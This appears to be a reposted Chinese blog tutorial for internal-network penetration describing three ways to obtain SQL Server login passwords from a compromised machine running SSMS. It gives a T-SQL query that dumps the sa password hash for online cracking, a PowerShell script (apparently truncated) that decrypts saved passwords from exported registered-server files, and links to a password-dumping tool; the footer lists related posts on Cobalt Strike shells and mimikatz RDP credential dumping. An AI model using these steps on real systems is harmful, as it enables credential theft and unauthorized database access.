1. Toy模板网首页
  2. > Toy博客

三种方式获取SSMS连接密码

9月前 作者:一斤阳光 分类:Toy博客 阅读(24) 违法举报

这篇具有很好参考价值的文章主要介绍了三种方式获取SSMS连接密码。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

内网渗透是有的时候会遇到对方SSMS没断开连接正连着别的机器的mssql此时有两种方法可以获取sa密码。

当密码强度较弱时可以使用第一只方式,第一种方式解不开的情况下可以使用后面二种方式。

1.直接查询sa密码hash

使用如下语句:

Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = ‘sa’

直接得到sa密码hash
三种方式获取SSMS连接密码
上cmd5解密
三种方式获取SSMS连接密码

2.使用SSMS的注册导出功能

右键点击,然后选择注册
三种方式获取SSMS连接密码
点击保存
三种方式获取SSMS连接密码
点击识图然后点击已注册服务器
三种方式获取SSMS连接密码
然后右键选择任务,然后导出
三种方式获取SSMS连接密码
这个记得别勾,点确定
三种方式获取SSMS连接密码
然后使用powershell脚本解密

param(
[Parameter(Mandatory=$true)]
[string] $FileName
)
Add-Type -AssemblyName System.Security
$ErrorActionPreference = 'Stop'
function Unprotect-String([string] $base64String)
{
return
[System.Text.Encoding]::Unicode.GetString([System.Security.Cryptography.ProtectedData]::Unprotect([System.Convert]::FromBase64String($base64String
), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser))
}
$document = [xml] (Get-Content $FileName)
$nsm = New-Object 'System.Xml.XmlNamespaceManager' ($document.NameTable)
$nsm.AddNamespace('rs', 'http://schemas.microsoft.com/sqlserver/RegisteredServers/2007/08')
$attr = $document.DocumentElement.GetAttribute('plainText')
if ($attr -ne '' -and $Operation -ieq 'Decrypt')
{
throw "The file does not contain encrypted passwords."
}
$servers = $document.SelectNodes("//rs:RegisteredServer", $nsm)
foreach ($server in $servers)
{
$connString = $server.ConnectionStringWithEncryptedPassword.InnerText
echo ""
echo "Encrypted Connection String:"
echo $connString
echo ""
if ($connString -inotmatch 'password="?([^";]+)"?') {continue}
$password = $Matches[1]
$password = Unprotect-String $password
echo ""
echo "Decrypted Connection String:"
$connString = $connString -ireplace 'password="?([^";]+)"?', "password=`"$password`""
echo $connString
echo ""

三种方式获取SSMS连接密码文章来源地址https://www.toymoban.com/news/detail-447026.html

3.导出SSMS记住的密码

http://www.zcgonvh.com/post/SQL_Server_Management_Studio_saved_password_dumper.html

https://github.com/zcgonvh/SSMSPwd

到了这里,关于三种方式获取SSMS连接密码的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • 内网渗透-cobaltstrike之cs上线获取shell

    内网渗透-cobaltstrike之cs上线获取shell

    CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马

    2024年02月10日
    浏览(47)
  • 利用mimikatz查看rdp连接密码【渗透测试】

    利用mimikatz查看rdp连接密码【渗透测试】

    0x00 概述 在使用 rdp 时会发现系统有保存连接密码的功能,一定在本地以一种加密方式保存,在连接的时候解密进行rdp尝试,那么我们能不能那到加密的密码解密以获取这台机器rdp连接过的机器呢? 0x01 流程 “AppDataLocalMicrosoftCredentialsXXX”  -- GUID(guidMasterKey)  -- 通过 sek

    2024年02月05日
    浏览(46)
  • [内网]RDP远程桌面密码凭证获取

    [内网]RDP远程桌面密码凭证获取

    在授权渗透过程中,如果获取了一台windows的权限,可以尝试去获取该主机保存的远程桌面连接凭证,从而在内网横向中扩大成果。 也就是当我们获取一台windows服务器,可以尝试获取本地远程连接的信息 甚至可以拿到明文密码,横向移动。 RDP保存凭据 通过rdp服务登录远程桌

    2024年02月11日
    浏览(67)
  • SpringSecurity设置登录账号密码的三种方式

    SpringSecurity设置登录账号密码的三种方式

    一、SpringBoot整合SpringSecurity: 1.新建SpringBoot工程,引入SpringSecurity依赖 2.编写一个测试Controller  3.修改访问端口(默认8080) 4.启动SpringBoot工程,访问http://localhost:8001/test/hello  如上自动跳转到登录页面,输入账号user,密码在控制台输出,如下所示  5.查看是否登录成功(如下

    2024年02月01日
    浏览(45)
  • 获取Git权限的三种方式

    获取Git权限的三种方式

    本文以为Azure Devlop的平台为例子操作三种获取Git权限的办法 Github、Gitlab、Gitee、Gitcode等平台操作类似 主要是便于理解获取Git权限的几种采用方式 Git工具安装时,如果没有特别勾选不安装SSH,默认是Git安装好之后是会携带了SSH工具 本文以git clone指令拉取代码为例子,当没有权

    2024年01月16日
    浏览(65)

  • 【SpringBoot】获取HttpServletRequest的三种方式

    线程安全 缺点: 每个方法都需要写一遍 线程安全 在 Spring 中, DemoRequestController 的 scope 是 singleton (单例),也就是说在整个 web 系统中,只有一个 DemoRequestController ;但是其中注入的 request 却是线程安全的,原因在于:使用这种方式,当 Bean (本例的 DemoRequestController )初始化

    2024年02月12日
    浏览(45)
  • 虚拟机三种网络连接方式

    虚拟机三种网络连接方式

    第一种连接方式- 桥接模式 原理图 : 桥接模式效果 :通过桥接,我们让vm虚拟机和真正主机pc3处在了一片局域网下,vm虚拟机可以访问pc123也可以外网(Internet),同时pc123也可以访问vm虚拟机。 好处 是vm虚拟机可以上外网,还能让pc访问; 坏处 是这样的连接安全性较低,我们

    2024年02月16日
    浏览(47)
  • SpringBoot获取HttpServletRequest、HttpServletResponse的三种方式

    SpringBoot获取HttpServletRequest、HttpServletResponse的三种方式

    仅仅适用在controller方法上。当Spring接收到HTTP请求时,会寻找一个合适的方法来处理该请求。如果该方法参数上标注了@RequestMapping或@Get、@Post等注解,Spring就会将HttpServletRequest对象注入到该参数中。 适用于所有的bean 通过调试可以看到,注入的Reques是一个代理类,而这个被代

    2024年02月19日
    浏览(48)

  • SpringBoot获取Request请求的三种方式

    Request对象包含了请求的各种信息,比如请求方法、请求URL、请求参数、请求内容等等,这些信息可以供服务器进行处理和响应。那么在SpringBoot中,怎么才能获取到Request对象? 本文将介绍三种方法,并提示例参考。 一、直接在Controller方法参数上注入HttpServletRequest 这是最常用

    2024年02月04日
    浏览(56)
  • Python获取本机IP地址的三种方式

    Python获取本机IP地址的三种方式

    目录 1、使用专用网址 2、使用自带socket库 3、使用第三方netifaces库 获取的是 公网IP 。 网址:http://myip.ipip.net 代码: 具体可以类似这样:  比较喜欢用这个,在命令窗口也能使用: 还可以用这个: https://api.ipify.org 获取的是 局域网IP 。 但是上面这个获取的 不是 公网IP,结果

    2024年02月04日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包